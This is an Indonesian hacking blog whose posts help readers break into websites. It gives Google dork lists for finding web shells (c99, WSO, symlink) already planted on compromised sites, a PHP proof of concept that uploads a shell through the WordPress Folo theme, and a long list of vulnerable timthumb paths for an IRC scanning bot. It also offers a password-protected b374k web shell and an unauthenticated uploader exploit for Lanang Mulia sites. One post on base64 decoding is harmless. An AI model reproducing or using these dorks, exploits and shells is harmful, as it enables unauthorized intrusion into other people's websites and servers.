::

Navbar Bawah

Search This Blog

Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Friday, 5 September 2014

Shell Dork Searching Google SQL Shell Bug Searching c99 r58 wso2 linux cgi shell

Assalamualaikum sobat cyberbintauna,pada kesempatan malam hari ini saya akan share lagi cara mencari shell injection yang sudah tertanam di website, cara ini bisa dibilang mencuri, kenapa mencuri karena kita akan mencari shell yang sudah di tanam oleh orang lain, entah itu hacker, cracker, defacer, newbie atau juga Script Kiddies dan masih banyak lagi.
Disini kita akan menggunakan google kalo mau coba di bing juga bisa.
Berikut beberapa dork yang bisa sobat pakai buat mencari alamat link shell injection yang sudah tertanam di website. o iya dari survey yang sudah saya lakukan kebanyakan shell injection terbaru sudah memakai password buat melindungi jln masuknya. jadi kalo sobat ketemu terus shellnya memakai password maka sobat di anjurkan untuk mencari yang lain lagi :v

caranya : copi dork dibawah ini trus pastekan ke kolom pencarian google.

intitle:webr00t cgi shell
“inurl:.root”.”webr00t cgi shell”
“intitle:Index of */sym”.”inurl:/sym”
“5.2.17 Safe mode:”
“5.2.11 Safe mode:”
“5.2.12 Safe mode:”
“Sifre=webr00t”
“5.2.11 Safe mode:”
“5.2.10 Safe mode:”
“5.2.1 Safe mode:”
intxt:”webadmin.php”
inurl:webadmin.php”
intitle: Linux * 2.6.18-348.1.1.el5PAE
intitle: – WSO 2.3
intitle: – WSO 2.4
intitle: – WSO 2.5
intitle: – WSO 2.5.1
5.2.16 Safe mode: OFF [ phpinfo ] Datetime:
2009 i686 Server IP:
2010 i686 Server IP:
2011 i686 Server IP:
2012 i686 Server IP:
2013 i686 Server IP:
“Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate”
“Downloaders: wget, lynx, links, curl, lwp-mirror”
“Type Host Login Password Database”
“Execution PHP-code”
“reverse (login -> nigol)”.”/etc/passwd”
” Bind port to /bin/sh [perl]“
“drwxr-xr-x [ home ]“
inurl:wso2.php
inurl:wso2.4.php
inurl:wso2.5.php
inurl:wso2.5.1.php
“Filesystem Size Used Avail Use% Mounted on”
“# Do not remove the following line, or various programs”
inurl:wso.php uid=0(root)
“posix_getpwuid (“Read” /etc/passwd)”
“captain crunch security team” inurl:wso
download wso2.php
download wso2.5.1.php
inurl:sym.php
allinurl: wsotest.php
inurl:wso.php
“-:[ User & Domains & Symlink ]:-“
allinurl: wso.php
inurl:”/wso.php”
allinurl: wso2.5.php
inurl:wso.php
inurl:”sym.php” Symlink Sa 3.0
inurl:wso.php uid=0(root)
“Symlink Sa 3.0″
intitle:Symlink Sa 3.0
inurl:”/wso.php”
inurl:wso.php
inurl:wso2.php
inurl:wso2.5.php
inurl:wso2.5.1.php
wso shell v.1.0 (roots)
inurl:wso.php
allintitle: “[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
inurl:”[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
intxt:[ Bypass Read ] [ Mass Joomla ] [ Mass WordPress ] [ Mass vBulletin ] [ Help ]
intitle:B-F Config_cPanel
intitle:Blind SQL Injection
intitle:Bypass Disable function
intitle:Carbylamine PHP Encoder
intitle:Change Joomla Index
intitle:Change WP Index
intitle:Converter Havij To Pro
intitle:Cpanel Brute Forcer 2012
intitle:Cpanel Brute Forcer 2011
intitle:Cpanel Brute Forcer 2013
intitle:Cpanel Webmail Brute Forcer
intitle:Face Book Brute Forcer
intitle:zip Filez Server ScaNNer v1.0
“Saudi Sh3ll v1.0″
inurl:wso.php#
Allinurl:wso2.5.1.php#
Allinurl:wso2.5.php#
Allinurl:wso2.4.php#
intitle:wsec_wp GUI v1.0
intitle:Symlink Sa v3.0
intitle:Symlink Sa v2.0
intitle:Symlink Sa v1.0
intitle:king B_F v1.0 Brute Forcer script
intitle:r00t4Lif t00lkit v0.2
allinurl: “wso.php”

tambahan: dork diatas bebas untuk sobat kembangkan lagi biar bisa dapat hasil yang memuaskan.
Read More --►

Wordpress Folo Shell Upload

Exploit Title : Wordpress Themes Folo File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Type : php, html, htm, asp, etc.
#Category : Web Application
#Vulnerability : File Upload
#Tested On : Windows 7 64-bit (mozilla firefox)

#Dork :inurl:/wp-content/themes/folo/ ( dork bisa agan kembangkn sndri)

  #POC :

$uploadfile=”r00t.php”;
$ch = curl_init(“http://korban/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php?upload=1″);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>

#Results See Your Shell On : http://korban/%5BPATH%5D/wp-content/themes/folo/uploads/{YOUR_FILE}.php
Read More --►

Tuesday, 15 July 2014

Bug Dork Timthumb Terbaru Update 2014

Hello assalamualaikum sobat cyberbintauna, apa kabar?
o iya sebelumnya admin mo sampaikan dlu selamat berbuka puasa aja buat daerah wilayah sulawesi.
kali ini admin mo share Bug Dork yang biasa dipake buat cari target website wordpress.
Kali ini admin kasih cara paling Gampang Buat hack website CMS wordpress Tanpa kita harus susah" cari celah disalah satu website.
disini kita hanya memerlukan 1 applikasi MIRC kalo belum punya bisa download Disini 
trus sobat bisa masuk ke server yang sudah admin sediakan disini.
/server irc.cyberbintauna.org:2014

Untuk cara pakai bug dorknya gampang, tinggal sobat Kopi Paste saja ke chanel irc, maka bot yang admin sudah sediakan akan secara auto menscan website-website yang mempunyai celah buat kita tembus. Berikut Bug dorknya.

!tim /wp-content/themes/welcome_inn/thumb.php "/themes/welcome_inn" +page_id=
!tim /wp-content/themes/Snapwire/timthumb.php "/themes/Snapwire/"
!tim /wp-content/themes/Aggregate/timthumb.php "Aggregate Logo"
!tim /wp-content/themes/DeepFocus/timthumb.php "DeepFocus Logo"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "Sport WordPress Theme by"
!tim /wp-content/themes/TheStyle/timthumb.php "thestyle logo"
!tim /wp-content/themes/fashion/includes/thumb.php "/themes/fashion/includes/"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion theme by Sayontan Sinha"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress"
!tim /wp-content/themes/Webly/timthumb.php "webly logo"
!tim /wp-content/themes/newoffer/timthumb.php "WordPress Theme by iKarina"
!tim /wp-content/themes/modularity/includes/timthumb.php "modularity theme by"
!tim /wp-content/themes/Polished/timthumb.php "polished logo"
!tim /wp-content/themes/ecobiz/timthumb.php "Designed by imediapixel.com"
!tim /wp-content/themes/ecobiz/timthumb.php "themes/ecobiz" +"Posted on *"
!tim /wp-content/themes/Lumin/timthumb.php "Powered by WordPress" "Designed by Elegant Themes"
!tim /wp-content/themes/OptimizePress/timthumb.php "Powered by Optimizepress"
!tim /wp-content/themes/Magnificent/timthumb.php "Magnificent Logo"
!tim /wp-content/themes/goodnews/framework/scripts/timthumb.php "Goodnews Theme By Momizat Team"
!tim /wp-content/themes/Chameleon/timthumb.php "Chameleon logo"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/bestvariety/scripts/timthumb.php "/themes/bestvariety"
!tim /wp-content/themes/Envisioned/timthumb.php "envisioned logo"
!tim /wp-content/themes/AskIt/timthumb.php "AskIt logo"
!tim /wp-content/themes/dandelion_v2.5/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.2.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.1/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.2/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.3/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion_v2.6.4/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/dandelion/functions/timthumb.php "Designed by Pexeto"
!tim /wp-content/themes/retreat/thumb.php "WordPress Tumblog Theme" "Exclusively by"
!tim /wp-content/themes/kingsize/timthumb.php "Hide menu" kingsize
!tim /wp-content/themes/ElegantEstate/timthumb.php "ElegantEstate logo"
!tim /wp-content/themes/ElegantEstate/timthumb.php "/themes/ElegantEstate/"
!tim /wp-content/themes/LondonLive/thumb.php "/themes/LondonLive/"
!tim /wp-content/themes/LondonLive/thumb.php "Designed by Skyali"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme"
!tim /wp-content/themes/LeanBiz/timthumb.php "LeanBiz Theme" "designed by"
!tim /wp-content/themes/openair/thumb.php "Open Air by" wordpress
!tim /wp-content/themes/mosaic/inc/timthumb.php "Theme Design by iKreativ"
!tim /wp-content/themes/striking/includes/timthumb.php "/themes/striking/"
!tim /wp-content/themes/invictus/timthumb.php "Invictus" "Background Wordpress Theme"
!tim /wp-content/themes/masterful/timthumb.php "/themes/masterful/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "Designed & Developed by der|Design"
!tim /wp-content/plugins/pointelle-slider/includes/timthumb.php "/plugins/pointelle-slider/"
!tim /wp-content/themes/TheTravelTheme/includes/timthumb.php "/themes/TheTravelTheme/"
!tim /wp-content/themes/Mentor/timthumb.php "Mentor WordPress Theme designed by"
!tim /wp-content/themes/metrolo/scripts/thumb.php "/themes/metrolo/"
!tim /wp-content/themes/webstudio/thumb.php "/themes/webstudio/"
!tim /wp-content/themes/easini/timthumb.php "/themes/easini/"
!tim /wp-content/themes/theblock/timthumb.php "/themes/theblock/"
!tim /wp-content/themes/intelligible/timthumb.php "/themes/intelligible/"
!tim /wp-content/themes/vilisya/timthumb.php "/themes/vilisya/"
!tim /wp-content/themes/Cadca/php/timthumb.php "/themes/Cadca/"
!tim /wp-content/themes/urbanhip/includes/timthumb.php "/themes/urbanhip/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "/themes/duotive-three/"
!tim /wp-content/themes/duotive-three/includes/timthumb.php "created by duotive"
!tim /wp-content/themes/hulk/scripts/timthumb.php "/themes/hulk/scripts/"
!tim /wp-content/themes/village/timthumb.php "themes/village/"
!tim /wp-content/themes/picnic/inc/timthumb.php "/themes/picnic/"
!tim /wp-content/themes/monmarthe/php/thumb.php "/themes/monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2010 Monmarthe"
!tim /wp-content/themes/monmarthe/php/thumb.php "2011 Monmarthe"
!tim /wp-content/themes/life/scripts/timthumb.php "iamthemes.com"
!tim /wp-content/themes/life/scripts/timthumb.php "/themes/life/scripts/"
!tim /wp-content/themes/thefirm/wizy/scripts/timthumb/timthumb.php "/thefirm/wizy/scripts/timthumb/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "/themes/thecotton/"
!tim /wp-content/themes/thecotton/lib/utils/timthumb.php "Powered by The Cotton Theme"
!tim /wp-content/themes/gridline/lib/scripts/timthumb.php "Gridline designed and produced by"
!tim /wp-content/themes/Inspired/thumb.php "Inspired" "Designed by "
!tim /wp-content/themes/specere/inc/timthumb.php "/themes/specere/inc/"
!tim /wp-content/themes/Nova/timthumb.php "nova logo"
!tim /wp-content/themes/TheProfessional/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/TheCorporation/timthumb.php "Designed by Elegant Themes"
!tim /wp-content/themes/u-design/scripts/timthumb.php "U-Design is proudly powered by "
!tim /wp-content/themes/arthemia-premium/scripts/timthumb.php "Arthemia Premium by ColorLabs Project"
!tim /wp-content/themes/GrungeMag/timthumb.php "GrungeMag"
!tim /wp-content/themes/MyCuisine/timthumb.php "mycuisine logo"
!tim /wp-content/themes/dt-chocolate/thumb.php "chocolate WP" "All rights reserved"
!tim /wp-content/themes/prosto/functions/thumb.php "prosto. All rights reserved"
!tim /wp-content/themes/snapshot/thumb.php "Snapshot Theme by"
!tim /wp-content/themes/premiumnews/thumb.php "Original News Theme by "
!tim /wp-content/themes/Feather/timthumb.php "feather Logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo"
!tim /wp-content/themes/InReview/timthumb.php "inreview logo" "designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty" "Designed by"
!tim /wp-content/themes/Modest/timthumb.php "We Design With Modesty"
!tim /wp-content/themes/gazette/thumb.php "Gazette Theme by"
!tim /wp-content/themes/flashnews/thumb.php "Flash News Theme by"
!tim /wp-content/themes/livewire/thumb.php "Live Wire Series Theme by"
!tim /wp-content/themes/overeasy/thumb.php "Powered by WordPress" "OverEasy by"
!tim /wp-content/themes/cushy/thumb.php "Cushy Theme by"
!tim /wp-content/themes/dailyedition/thumb.php "Daily Edition Theme by"
!tim /wp-content/themes/canvas/thumb.php "themes/canvas"
!tim /wp-content/themes/freshnews/thumb.php "themes/freshnews"
!tim /wp-content/themes/aperture/thumb.php "themes/aperture"
!tim /wp-content/themes/biznizz/thumb.php "themes/biznizz"
!tim /wp-content/themes/Spectrum/thumb.php "themes/Spectrum"
!tim /wp-content/themes/CoffeeBreak/thumb.php "themes/CoffeeBreak"
!tim /wp-content/themes/Continuum/thumb.php "themes/Continuum"
!tim /wp-content/themes/telegraph/scripts/timthumb.php "telegraph/scripts" "Designed by"
!tim /wp-content/themes/photoria/scripts/timthumb.php "Portfolio WordPress Theme by"
!tim /wp-content/themes/graphix/scripts/timthumb.php "themes/graphix" "Designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "cadabrapress" "All Rights Reserved" "designed by"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/cadabrapress/scripts/"
!tim /wp-content/themes/magazinum/scripts/timthumb.php "Magazinum" "All Rights Reserved" "designed by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "WordPress Video Theme by"
!tim /wp-content/themes/videozoom/scripts/timthumb.php "/videozoom/scripts/"
!tim /wp-content/themes/manifesto/scripts/timthumb.php "manifesto/scripts"
!tim /wp-content/themes/gallery/scripts/timthumb.php "GALLERY Theme by"
!tim /wp-content/themes/optimize/thumb.php "themes/optimize"
!tim /wp-content/themes/DynamiX/lib/scripts/timthumb.php "Powered By DynamiX"
!tim /wp-content/themes/Karma/functions/timthumb.php "themes/Karma"
!tim /wp-content/themes/Karma/functions/thumbs.php "themes/Karma"
!tim /wp-content/themes/Growing-Feature/includes/thumb.php "/themes/Growing-Feature" +logo
!tim /wp-content/themes/profitstheme/thumb.php "Powered By Profits Theme From"
!tim /wp-content/themes/Nyke/timthumb.php "/themes/Nyke/"
!tim /wp-content/themes/rend/scripts/timthumb.php "themes/rend"
!tim /wp-content/themes/echea/timthumb.php "themes/echea"
!tim /wp-content/themes/awake/lib/scripts/thumb.php "themes/awake"
!tim /wp-content/themes/academica/scripts/timthumb.php "Education WordPress Theme by"
!tim /wp-content/themes/academica/scripts/timthumb.php "/academica/scripts/"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "themes/parachute"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "Parachute designed and produced by GhostPool"
!tim /wp-content/themes/soulbop/scripts/timthumb.php "soulbop/scripts"
!tim /wp-content/themes/airfolio/scripts/timthumb.php "themes/airfolio"
!tim /wp-content/themes/Romix/scripts/thumb.php "Romix/scripts"
!tim /wp-content/themes/granda/scripts/timthumb.php "/granda/scripts/"
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "/themes/aquitaine/"
!tim /wp-content/themes/ibuze/scripts/timthumb.php "/ibuze/scripts/"
!tim /wp-content/themes/reviewit/lib/scripts/timthumb.php "/themes/reviewit/"
!tim /wp-content/themes/bizpress/scripts/timthumb.php "/bizpress/scripts/"
!tim /wp-content/themes/headlines/thumb.php "themes/headlines"
!tim /wp-content/themes/genoa/timthumb.php "WordPress and WPCrunchy"
!tim /wp-content/themes/multidesign/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/smoke/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/genoa/timthumb.php "Genoa Theme"
!tim /wp-content/plugins/kino-gallery/timthumb.php "Developed by Kino Creative"
!tim /wp-content/themes/tarnished/lib/scripts/timthumb.php "Copyright © Tarnished"
!tim /wp-content/themes/exhibit/lib/scripts/timthumb.php "Exhibit designed and produced by GhostPool."
!tim /wp-content/themes/averin/timthumb.php "averin" Logo
!tim /wp-content/themes/redcarpet/thumbopen.php "themes/redcarpet/"
!tim /wp-content/themes/comfy/thumbopen.php "/themes/comfy/"
!tim /wp-content/themes/comfy-3/thumbopen.php "themes/comfy-3/"
!tim /wp-content/themes/comfy-3.0.9/thumbopen.php "/comfy-3.0.9/"
!tim /wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs · Sitemap · Privacy Policy"
!tim /wp-content/themes/widescreen/includes/timthumb.php "— Hide menu"
!tim /wp-content/themes/push/framework/lib/timthumb.php "/themes/push/framework/lib/"
!tim /wp-content/themes/headlines/thumb.php "Designed by Top Wp Plugins"
!tim /wp-content/themes/thejournal/thumb.php "/themes/thejournal/"
!tim /wp-content/themes/couponpress/thumbs/_tbs.php "/themes/couponpress/"
!tim /wp-content/themes/rockwell_v1.3/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.0/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.7.1/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/catalyst/timthumb.php "themes/catalyst"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "Clockstone" "All Rights Reserved"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "/themes/clockstone/"
!tim /wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php "Black Sakura WP"
!tim /wp-content/themes/broadcast/thumb.php "Broadcast. All Rights Reserved"
!tim /wp-content/themes/amplus/functions/timthumb.php "/amplus/functions/"
!tim /wp-content/themes/cubed/functions/timthumb.php "/themes/cubed/functions/"
!tim /wp-content/themes/curvo/functions/timthumb.php "/curvo/functions/"
!tim /wp-content/themes/peano/functions/img_resize/timthumb.php "/themes/peano/functions"
!tim /wp-content/themes/especial/libraries/timthumb.php "Especial Wordpress Theme"
!tim /wp-content/themes/city/scripts/timthumb.php "City Themes" "All rights reserved."
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "Aquitaine Ltd. All rights reserved"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "/themes/dropholio/"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "2011 Dropholio"
!tim /wp-content/themes/stufe/scripts/timthumb.php "/stufe/scripts/"
!tim /wp-content/themes/thestation/thumb.php "/themes/thestation/"
!tim /wp-content/themes/mainstream/thumb.php "/themes/mainstream/"
!tim /wp-content/themes/rockstar/thumb.php "/themes/rockstar/"
!tim /wp-content/themes/bueno/thumb.php "/themes/bueno/"
!tim /wp-content/themes/backstage/thumb.php "/themes/backstage/"
!tim /wp-content/themes/deliciousmagazine/thumb.php "/themes/deliciousmagazine/"
!tim /wp-content/themes/mosaico/js/timthumb.php "/themes/mosaico/"
!tim /wp-content/themes/machtastic/_assets/timthumb.php "themes/machtastic"
!tim /wp-content/themes/cold/lib/timthumb.php "/themes/cold/lib/"
!tim /wp-content/themes/spicy/lib/timthumb.php "/themes/spicy/lib/"
!tim /wp-content/themes/lunar/lib/timthumb.php "/themes/lunar/lib/"
!tim /wp-content/themes/kolos/thumb.php "/themes/kolos/"
!tim /wp-content/themes/photobox/themify/img.php "/themes/photobox/"
!tim /wp-content/themes/bloggie/themify/img.php "/themes/bloggie/"
!tim /wp-content/themes/blogfolio/themify/img.php "/themes/blogfolio/"
!tim /wp-content/themes/bizco/themify/img.php "/themes/bizco/"
!tim /wp-content/themes/thememin/themify/img.php "/themes/ThemeMin"
!tim /wp-content/themes/sleex/scripts/thumb.php "/themes/sleex/"
!tim /wp-content/themes/matchpoint/functions/thumb.php "/themes/matchpoint/"
!tim /wp-content/themes/nitro/library/functions/timthumb.php "/themes/nitro/library/"
!tim /wp-content/themes/visual/library/functions/timthumb.php "/themes/visual/library/functions/"
!tim /wp-content/themes/myjourney_3.1/thumb.php "wp-content/themes/myjourney"
!tim /wp-content/themes/adinda/timthumb.php "themes/adinda"
!tim /wp-content/themes/myjourney/thumb.php "themes/myjourney/"
!tim /wp-content/themes/modus/thumb.php "/themes/modus/"
!tim /wp-content/themes/spitz/lib/scripts/timthumb.php "/themes/spitz/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "/themes/handcrafted/functions/"
!tim /wp-content/themes/vulcan/timthumb.php "/wp-content/themes/vulcan/timthumb.php"
!tim /wp-content/themes/equator/timthumb.php "/wp-content/themes/equator/timthumb.php"
!tim /wp-content/themes/FactoryWP/javascript/timthumb.php "/wp-content/themes/factory"
!tim /wp-content/themes/multimedia/thumb.php "/wp-content/themes/multimedia" ?src
!tim /wp-content/themes/glance/inc/timthumb.php "/wp-content/themes/glance"
!tim /wp-content/themes/picnic/inc/timthumb.php "/wp-content/themes/picnic"
!tim /wp-content/themes/setinstone/inc/timthumb.php "/themes/setinstone/inc/"
!tim /wp-content/themes/setinstone/inc/timthumb.php "Copyright 2011 Turkhitbox"
!tim /wp-content/themes/nvision/utils/timthumb.php "themes/nvision/utils/"
!tim /wp-content/themes/mercedesa/includes/thumb.php "/themes/mercedesa/includes/"
!tim /wp-content/themes/village/timthumb.php "/wp-content/themes/village" ?src=
!tim /wp-content/themes/explode/includes/timthumb.php "/wp-content/themes/explode/"
!tim /wp-content/themes/delight/scripts/timthumb.php "/themes/delight/scripts/"
!tim /wp-content/themes/delight/scripts/timthumb.php "©2011 Pixedelic by Consorzio Creativo"
!tim /wp-content/themes/precious/inc/timthumb.php "/themes/precious/inc/"
!tim /wp-content/themes/eruption/framework/lib/timthumb.php "/themes/eruption/"
!tim /wp-content/themes/cleanple/theme/classes/timthumb.php "/cleanple/theme/classes/"
!tim /wp-content/themes/blakesley/theme/classes/timthumb.php "/blakesley/theme/classes"
!tim /wp-content/themes/tribune/scripts/timthumb.php "tribune/scripts"
!tim /wp-content/themes/rezo/themify/img.php "wp-content/themes/Rezo" ?src=
!tim /wp-content/themes/edmin/themify/img.php "wp-content/themes/Edmin" ?src=
!tim /wp-content/themes/wigi/themify/img.php "wp-content/themes/wigi" ?src=
!tim /wp-content/themes/sidepane/themify/img.php "wp-content/themes/Sidepane" ?src=
!tim /wp-content/themes/Colt/thumb.php "wp-content/themes/Colt" ?src=
!tim /wp-content/themes/OnTheGo/timthumb.php "wp-content/themes/On the Go" ?src=
!tim /wp-content/themes/InnovationScience2/thumb.php "wp-content/themes/Innovation+Science" ?src=
!tim /wp-content/themes/Avenue/timthumb.php "wp-content/themes/Avenue" ?src=
!tim /wp-content/themes/blacklabel/framework/timthumb.php "/themes/blacklabel/"


Kalo Belum ngerti juga silakan PM saja nick Localhost di chanel irc dan silakan bertanya.
Kalo saya lagi online pasti saya jawab.
Read More --►

Monday, 7 July 2014

TimThumbCraft - Wordpress Theme Vulnerability



WordPress adalah salah satu platform blogging terbesar dunia dan dapat dengan mudah untuk kita terobos. berikut cara dan langkah-langkahnya untuk masuk pintu belakang wordpress.

penjelasaN lebih lanjut bisa dibaca DISINI


Download toolsnya DISINI
Read More --►

Tuesday, 21 January 2014

LocalRoot Exploit Collection terbaru


hello sobat cyberbintauna, pas tadi jalan-jalan bareng om google e ketemu ni tempat kumpulan localroot exploit buat ngeroot atau mendapat acces yang tinggi di suatu server :v akh capek lebih lengkap pengertianya silakan agan tanya langsung ke om google aja :v

ini ada beberapa tempat kumpulan LocalRoot Exploit Collection terbaru yang ane temuin bareng om google :D
Cekidot:
List 1 : Cekidot
List 2 : Cekidot lagi..
List 3 : Cekibrot
List 4 : Cekibrot lagi..

Mungkin itu aja dulu yang lain ntar nyusul pake jet :v
Read More --►

Script Shell b374k recoded by x'1n73ct end Localhost

Slamat malam sobat cyberbintauna, Kali ini saya mau share script shell b374k yang sudah di recoded sama x'1n73ct dan saya Localhost :D .
Script ini (shell injection) lumayan menurut saya cukup lengkap fitur-fitur di dalamnya.
dan bagusnya shell injection ini sudah di tambahin password, jadi kalo user lain yang ngga tau passwordnya jelas ngga bisa masuk atau bongkar-bongkar isi shell nya :v

ini screenshootnya:
cara buat ke kolom passwordnya biar ngga ribet setelah masuk shell nya tekan tombol TAB di keyboard agan. langsung deh isi passwordnya.

untuk penampakan script shell injectionnya ini screenshootnya :
nah segitu aja keteranganya.
kalo agan mau mencoba script shell injectionya agan bisa langsung download di link di bawah postingan ini.
o iya hampir lupa untuk PASSWORD shell injection ini "cyberbintauna" (tanpa tanda kutip).


Read More --►

Wednesday, 15 January 2014

Exploit CMS Lanang Mulia Uploader



Langsung aja ya sob ngga usah basa basi capek ngetiknya :v

Exploit Titel : Lanang Mulia Uploader Vulnerability

Untuk dorknya :
intext:" Web By: lanangmulia.net"
inurl:showdetail.php?mod=

catt : biar lebih banyak dapat target silakan di kembangkan sendiri dorknya :D

Exploit :
http://sitetarget.com/admin/upload_1.php

Jika belum di patch, disitu sobat bisa langsung upload shell sobat tanpa harus tamper data maupun login :v, kalo agan belum punya script shell nya silakan di download di SINI.
Nah, kalo agan berhasil upload shellnya agan bisa cek di
http://sitetarget.com/foto/namashellagan.php


ok gan mungkin segitu aja, eits kalo udah dapet banyak jangan lupa bagi-bagi ke ane ya gan :v

Thanks For All Cyberbintauna Hacking TeaM
Read More --►

Tuesday, 14 January 2014

Cara paling simple decode base64

assalamualaikum sahabat cyberbintauna, kali ini di tahun 2014 dan posting pertama ane akan share cara paling simple decode base64.
mungkin dintara para sahabt cyberbintauna sudah banyak yang tahu, tapi moga bermanfaat buat yang baru tahu.
kadang kita butuh jugakan decode base64, nah masalahnya masa kita harus repot repot nyari situs base64 decoder cuma untuk mendecode base64 iya toh? dan gak mungkin juga harus repot-repot bikin script panjang cuma untuk mendecode base64.
padahal ada langkah paling gampang dan mudah di ingat untuk mendecode base64 tanpa harus online
caranya adalah dengan mengetikan ini di kolom url browser kita, dan tu browser gak harus konek ke internet (mayan ngehemat bandwidth gan :D)

data:text/html;base64,pastedisiniyang mau di decode

contohnya kayak gini

data:text/html;base64,PGgxPkxvY2FsaG9zdCBNZW1hbmcgR2FudGVuZyA6cCA6djwvaDE+

coba paste di kolom url,,
ini juga selain bermanfaat untuk sekedar mendecode, juga bisa di gunakan di css untuk nyimpan gambar kecil kecil,, atau bisa juga untuk membuat semacam popup gitu.
kalau mau lebih jelasnya mungkin bisa di baca di sini gan
_http://en.wikipedia.org/wiki/Data_URI_scheme

mungkin itu saja yang bisa ane share ke sahabat cyberbintauna kali ini, kalu ada yang baru nanti langsung ane update jadi rajin-rajinlah mampir ke blog ane yg sederhana ini :D
Read More --►

Friday, 1 November 2013

Kumpulan Dork Untuk Mencari Shell

Assalamualaikum sobat Cyberbintauna, Postingan saya kali ini akan berbagi Kumpulan Dork Untuk Mencari Shell. Terkadang seseorang lupa atau memang sengaja tidak menghapus shell yang mereka tanam pada sebuah website hasil hacking mereka. Nah, oleh karena itu, kita bisa memanfaatkan google (mesin pencari) untuk menemukan shell yang masih tertanam pada sebuah website menggunakan dork. saya rasa semua sudah pada tau apa yang di maksud dengan dork itu.

Nah Ini dia kumpulan Dork yang masih bisa digunakan untuk mencari shell C99 & Symlink :

intitle:symlink_Sa 2.0
inurl:.php?sws=sec
inurl:.php?sws=sym
inurl:.php?sws=file
inurl:.php?act=selfremove
inurl:.php?act=sql
safe-mode: off (not secure)
drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team"
inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release
+uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch
Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self
remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release
+uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure)
drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build
#5
--[ c99shell v. 1.0 pre-release build
#16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
!c99shell v. 1+Safe-mode: OFF (not
secure)
"C99Shell v. 1.0 pre-release build
"
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release
+uname
intitle:!C99Shell v. 1.0 pre-release
build #16! root
!C99Shell v. 1.0 pre-release build
#5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build
#16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-
release build #12
